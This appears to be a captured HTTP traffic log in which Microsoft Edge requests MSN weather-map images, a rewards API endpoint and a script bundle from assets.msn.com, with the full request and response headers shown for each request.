akamai-request-bc: [a=88.221.24.111,b=431557285,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90aa5
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310044.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310044.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: 6or8oBIRXYKgbxYiYd60dA==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C34282F5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 71eae973-f01e-0025-20aa-1c8f89000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 7250
akamai-request-bc: [a=88.221.24.111,b=431557292,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90aac
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310108.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310108.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: 0iwtkrASJuPOlKvuin3zIw==
last-modified: Fri, 30 Dec 2022 23:58:32 GMT
etag: 0x8DAEAC1C1949C80
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 55792262-201e-007b-55aa-1c6469000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 12412
akamai-request-bc: [a=88.221.24.111,b=431557344,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90ae0
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310108.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310108.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: U4u8o+PQcERlHX5T6U79ew==
last-modified: Fri, 30 Dec 2022 23:58:34 GMT
etag: 0x8DAEAC1C2EB20DC
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 27d0db37-101e-002d-47aa-1c9586000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 6721
akamai-request-bc: [a=88.221.24.111,b=431557393,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90b11
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310132.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310132.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: m49AKH1P8SJFGU/yt0LkWQ==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C3A888D9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 49d18984-a01e-00cc-63aa-1c49c3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 12437
akamai-request-bc: [a=88.221.24.111,b=431557432,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=17, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90b38
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310132.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310132.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: X0fEYf+QCnh6OOHiwiPveg==
last-modified: Fri, 30 Dec 2022 23:58:36 GMT
etag: 0x8DAEAC1C3C72FF1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 19d44630-601e-0055-06aa-1c367e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 7253
akamai-request-bc: [a=88.221.24.111,b=431557508,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=17, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90b84
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /weathermapdata/1/static/background/v2.0/jpg/rain_2.jpg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: 3oeBtRfL6jTAOgoYcShwSQ==
last-modified: Tue, 17 Aug 2021 10:15:39 GMT
etag: 0x8D96167F6CB9DB1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 04911810-101e-004a-0d6e-0ecad9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
content-length: 2793
unused62: 8096267
expires: Mon, 09 Jan 2023 21:21:17 GMT
date: Sat, 31 Dec 2022 00:06:06 GMT
akamai-request-bc: [a=88.221.24.111,b=431557670,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=17, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90c26
cache-control: public, max-age=2592000
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /weathermapdata/1/static/background/v2.0/jpg/sunny.jpg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: cqxTyRjzWnOAkxfsRuKFlA==
last-modified: Tue, 17 Aug 2021 10:15:39 GMT
etag: 0x8D96167F6CB9DB1
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 93a3bcd2-701e-004c-156d-0ef966000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
content-length: 1608
unused62: 8096267
expires: Mon, 09 Jan 2023 21:39:04 GMT
date: Sat, 31 Dec 2022 00:06:11 GMT
akamai-request-bc: [a=88.221.24.111,b=431566840,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=31, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b92ff8
cache-control: public, max-age=2592000
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/service/News/Users/me/Rewards?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-Peregrine&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&scn=APP_ANON&version=2msedge.exeRemote address:88.221.24.115:443RequestGET /service/News/Users/me/Rewards?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-Peregrine&cm=nl-nl&user=m-0B196D17FEC56BBC00017F9CFFCD6AE0&scn=APP_ANON&version=2 HTTP/2.0
host: assets.msn.com
cache-control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-encoding: gzip
access-control-allow-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
access-control-expose-headers: TicketType,RequestContinuationKey,AuthToken,Content-Type,x-client-activityid,ms-cv,signedInCookieName,muid,appid,User-Location,user-location,userauthtoken,usertickettype,sitename,s2sauthtoken,thumbprint,Authorization,Ent-Authorization,UserIdToken,DDD-TMPL,DDD-ActivityId,DDD-FeatureSet,DDD-Session-ID,Date,date,ads-referer,ads-referer,taboola-sessionId,taboola-sessionid,Akamai-Request-ID,Akamai-Server-IP,X-MSEdge-Ref,DDD-DebugId,s-xbox-token,OneWebServiceLatency,X-FD-Features,DDD-UserType
ddd-usertype: AnonymousMuid
ddd-activityid: 7f852e84-42d4-4130-a1bd-f1c66734338a
ddd-debugid: 7f852e84-42d4-4130-a1bd-f1c66734338a|2022-12-31T00:06:15.8406642Z|fabric:/msn|NEU1|News_97
onewebservicelatency: 8
x-msedge-responseinfo: 8
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F345DF54E631401A9F1E1950F830C317 Ref B: AMS04EDGE3106 Ref C: 2022-12-31T00:06:15Z
expires: Sat, 31 Dec 2022 00:06:15 GMT
date: Sat, 31 Dec 2022 00:06:15 GMT
content-length: 157
akamai-request-bc: [a=88.221.24.111,b=431574398,c=g,n=NL__AMSTERDAM,o=20940],[a=204.79.197.203,c=o]
server-timing: clientrtt; dur=29, clienttt; dur=43, origin; dur=43 , cdntime; dur=0
akamai-cache-status: Miss from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94d7e
access-control-allow-methods: PUT,PATCH,POST,GET,OPTIONS,DELETE
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
x-as-suppresssetcookie: 1
cache-control: private, max-age=0
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/static/weatherEplant/animation/greeting_once_cv2.gifmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/static/weatherEplant/animation/greeting_once_cv2.gif HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: 0EA3eCUvECcuDWLgvwY2+Q==
last-modified: Tue, 26 Jul 2022 07:10:48 GMT
etag: 0x8DA6ED5F77CE083
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2a85914b-b01e-0024-7a28-a1d055000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
content-length: 223818
expires: Tue, 10 Jan 2023 03:57:14 GMT
date: Sat, 31 Dec 2022 00:06:15 GMT
akamai-request-bc: [a=88.221.24.111,b=431574506,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=27, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b94dea
cache-control: public, max-age=2592000
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /weathermapdata/1/static/weatherEplant/bubble/32x32.png HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: B1C+HDCYvtchdeC81gjRGw==
last-modified: Tue, 28 Sep 2021 02:11:32 GMT
etag: 0x8D982254A479430
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 9010a8d2-601e-0050-071e-3aab06000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
content-length: 1986
unused62: 8096267
expires: Tue, 10 Jan 2023 04:51:15 GMT
date: Sat, 31 Dec 2022 00:06:16 GMT
akamai-request-bc: [a=88.221.24.111,b=431575703,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b95297
cache-control: public, max-age=2592000
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.2f86014fe9543279282f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/vendors.2f86014fe9543279282f.js HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://ntp.msn.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
